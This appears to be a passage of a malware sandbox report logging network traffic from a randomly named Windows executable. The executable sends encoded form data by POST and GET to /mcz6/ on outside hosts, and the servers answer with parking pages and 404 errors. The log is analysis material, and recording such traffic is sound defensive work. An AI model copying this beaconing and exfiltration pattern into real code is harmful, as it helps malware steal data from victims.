41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 5, 2024 15:08:09.954200029 CEST	579	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGQ5NTk2ZmQtNmEwMC00OTZkLWE3MzItNmZiMDQzZGRjMDRhIiwicGFnZV90aW1lIjoxNzE3NTkyOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49779	199.59.243.225	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:11.679203033 CEST	10844	OUT	POST /mcz6/ HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.zwervertjes.be Referer: http://www.zwervertjes.be/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 70 46 4f 48 39 47 49 34 72 38 44 5a 6a 42 6b 70 53 42 55 4d 50 39 5a 51 76 55 42 43 6a 71 6a 77 5a 35 51 51 62 6b 2f 4c 6e 59 56 7a 4b 2b 30 58 42 6e 47 77 70 7a 4e 75 68 2b 77 58 2b 46 6a 7a 70 77 73 79 70 39 6c 49 4b 6f 69 32 36 59 70 49 6c 43 74 73 74 66 31 66 36 79 39 73 67 45 4a 39 50 75 4f 66 76 7a 6f 4e 41 69 59 4e 59 6c 4e 61 4a 71 69 6c 4e 54 72 56 6b 7a 30 38 70 6a 53 72 53 35 53 70 52 68 36 64 65 67 38 57 68 5a 76 71 6b 71 46 64 6b 45 56 34 68 49 6b 46 44 58 39 57 38 74 6c 6a 6c 72 55 65 55 2f 67 32 38 53 6b 71 48 4a 71 41 68 50 66 55 64 57 47 4f 79 70 42 48 5a 56 42 6e 49 48 66 46 69 70 74 4d 42 63 72 4b 6b 39 4c 57 53 35 67 74 58 56 6a 2f 44 61 4c 6f 6a 6c 56 57 36 42 6c 70 34 4a 70 2f 4a 38 64 4d 6c 71 54 32 78 75 6e 4d 31 56 79 6a 6d 37 6a 42 42 6d 36 52 56 54 56 4b 67 55 44 66 51 31 62 33 78 75 74 46 35 4c 46 4a 6e 34 41 6e 61 7a 6e 52 57 36 6b 4c [TRUNCATED] Data Ascii: abN=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09ppFOH9GI4r8DZjBkpSBUMP9ZQvUBCjqjwZ5QQbk/LnYVzK+0XBnGwpzNuh+wX+Fjzpwsyp9lIKoi26YpIlCtstf1f6y9sgEJ9PuOfvzoNAiYNYlNaJqilNTrVkz08pjSrS5SpRh6deg8WhZvqkqFdkEV4hIkFDX9W8tljlrUeU/g28SkqHJqAhPfUdWGOypBHZVBnIHfFiptMBcrKk9LWS5gtXVj/DaLojlVW6Blp4Jp/J8dMlqT2xunM1Vyjm7jBBm6RVTVKgUDfQ1b3xutF5LFJn4AnaznRW6kLXpSmghuZTvKyrZ9MfgIQ2eLd6Z6s/l8cBylkv8pDow1RtnSiHOSawO+5n82LaparBkjvsP03phj6m+MpUoMGPY3iYHl1TDaLufWMM17ls69UhyBeWzzAIvWyCBwhjPtRmFP+/a0ZPTWCzzv4X7K/YG43CETQpeVBDAXO2975dPafu+R83cIrL7/5DTVj2CFO5IT5LDhHEQNJ+sACWJ6MJ27hrfkP3TGFVwJU6WFN8c7brDrG4wJYviKTGxvHug0fe0XGHWC0+ZUS8yiwqRq6Sp91QLeU/06As28tatRSnUjGaMvxH825xqgam6825GSVxlekqLyDqAz3TTs6QgQHminNjwyjRtkSO/VRZ9r27n89N1mC+KZ0ZgKUNMqHkJE+JXt4p4izoA8sO0TIARj8AcwcnVgDmRpKVhFqKEeHz5Y4recAiuq8CuSNFuHGJ3mA3nijnVZtY8yneXG/+Aj0MMekXeOk17Qojs7PkP/vrPUTSZVP3e9Xg1LaszpMdqklxkgEVKzwnxRWUVKsmJbygaOG4hv/72QD1gXzg6NEFijGTWTpQ2Egb1o/ktD+20XwPwlu9nyowEhdSwdWb0z2TuXtZ2OOk7Wp855lDouWeVFkcJ4oMTXZCvdwy8lmlVI1eUdL/JRBJ1pGWbS0Xtu014XpxgweE1aoXq [TRUNCATED]
Jun 5, 2024 15:08:12.297831059 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 05 Jun 2024 13:08:12 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 8a9763d9-16f3-4e5d-84d3-1c171a34cc19 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA== set-cookie: parking_session=8a9763d9-16f3-4e5d-84d3-1c171a34cc19; expires=Wed, 05 Jun 2024 13:23:12 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 5, 2024 15:08:12.297882080 CEST	579	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGE5NzYzZDktMTZmMy00ZTVkLTg0ZDMtMWMxNzFhMzRjYzE5IiwicGFnZV90aW1lIjoxNzE3NTkyOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49780	199.59.243.225	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:14.224941969 CEST	480	OUT	GET /mcz6/?abN=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:08:14.850076914 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 05 Jun 2024 13:08:14 GMT content-type: text/html; charset=utf-8 content-length: 1478 x-request-id: 14975291-ea9f-4bdb-83c5-b1a6f52e30e0 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KQhIFrvO+rKjkrhdWCzjH+trpeXXW79/am1rAamZijyep8Podv/UGi8mB/wByH3/ID9URN495oxeaytXA0Sm6w== set-cookie: parking_session=14975291-ea9f-4bdb-83c5-b1a6f52e30e0; expires=Wed, 05 Jun 2024 13:23:14 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 51 68 49 46 72 76 4f 2b 72 4b 6a 6b 72 68 64 57 43 7a 6a 48 2b 74 72 70 65 58 58 57 37 39 2f 61 6d 31 72 41 61 6d 5a 69 6a 79 65 70 38 50 6f 64 76 2f 55 47 69 38 6d 42 2f 77 42 79 48 33 2f 49 44 39 55 52 4e 34 39 35 6f 78 65 61 79 74 58 41 30 53 6d 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KQhIFrvO+rKjkrhdWCzjH+trpeXXW79/am1rAamZijyep8Podv/UGi8mB/wByH3/ID9URN495oxeaytXA0Sm6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 5, 2024 15:08:14.850136995 CEST	931	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTQ5NzUyOTEtZWE5Zi00YmRiLTgzYzUtYjFhNmY1MmUzMGUwIiwicGFnZV90aW1lIjoxNzE3NTkyOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49781	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:44.469264030 CEST	739	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: abN=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 5, 2024 15:08:45.128328085 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:08:45 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49782	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:47.000117064 CEST	759	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 65 69 66 64 70 42 64 44 39 54 61 34 6e 63 4c 47 74 39 69 65 78 64 5a 6e 2b 52 38 4b 78 71 53 59 34 3d Data Ascii: abN=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LeifdpBdD9Ta4ncLGt9iexdZn+R8KxqSY4=
Jun 5, 2024 15:08:47.664710999 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:08:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49783	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:08:49.537096977 CEST	10841	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 71 73 64 41 6d 66 52 6e 57 57 38 4b 79 39 44 74 4a 62 56 51 73 56 56 35 76 43 44 6d 30 6e 30 74 56 78 55 6c 6e 6e 67 61 42 72 50 73 44 53 68 48 5a 36 77 38 67 61 44 4d 4c 4a 41 2b 4c 32 31 76 56 57 77 6e 44 46 75 4a 50 49 30 4d 6d 45 35 35 64 44 6a 48 38 6b 49 70 53 38 7a 52 56 41 75 6a 42 2f 58 57 61 54 35 5a 2b 47 46 74 62 66 4a 31 59 76 66 47 4e 39 33 69 76 71 61 66 6e 59 4d 51 56 4e 4b 43 65 45 7a 72 6f 4f 75 33 34 35 72 49 37 44 78 6c 5a 49 66 31 37 73 56 72 76 2f 2f 36 6e 57 47 4f [TRUNCATED] Data Ascii: abN=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFqsdAmfRnWW8Ky9DtJbVQsVV5vCDm0n0tVxUlnngaBrPsDShHZ6w8gaDMLJA+L21vVWwnDFuJPI0MmE55dDjH8kIpS8zRVAujB/XWaT5Z+GFtbfJ1YvfGN93ivqafnYMQVNKCeEzroOu345rI7DxlZIf17sVrv//6nWGO8Kx0ipKCYQyZJab/evwhRiIseNXwa05Vzbl/FOXpdiImkHALPA0mbmodT39B82ybKS0v/ZxcyB38b7sWbHUPRdiPUCKCGMUjcafEEjlndBoVHy/svcIzCiQWckYbwwiKTnU0P6Dws9bRTzGawVTuTFxKrkKHi3kpUAsjp9Tw0B4pMwPiKrkubL2T7JdGx37gQKJUjMmqfPulAYYqggN6PZWu2RH+mY0351E4x3gHSH/yPwJn3gV31T6yiVLgcTmZfcoLzIOk5avnbPZlZYfm9Bv7sE8rvNKgjgNvgxW2RKRndrdCmNv/AeZHz8qkrG8KrTTnrlqJaYlBVEf6xX75iGm4levZ+13QkoVYN5x71eQzkXWtZUlt2tAbN0VVTf0FT9jU/YEebAFybA8wkdhx4AUyMjX4Adn1ZkFAcoJ5WWxPjR2+r20Wy7LPPa2EHk86RGHNEsEVIMwtsbck1i7al4d1gcAUo1OUDALwpEw1KDpJa8Qy/2TJJok25pUSwrNR4nLVl7mIlk87j2tudjl4c/XKh16GRUBooUoxcgKP5y84w30ptKpwspIzGHUbkHK74B/uauWclSkNxAxCOrK8S9MBFNaxnl1hJqP6VW7TYYi7tPi8eJS4vzIaGR1MlR3pEgk5nmMIKxvz7/DxZs6vJKo7ptRX+E3Q89 [TRUNCATED]
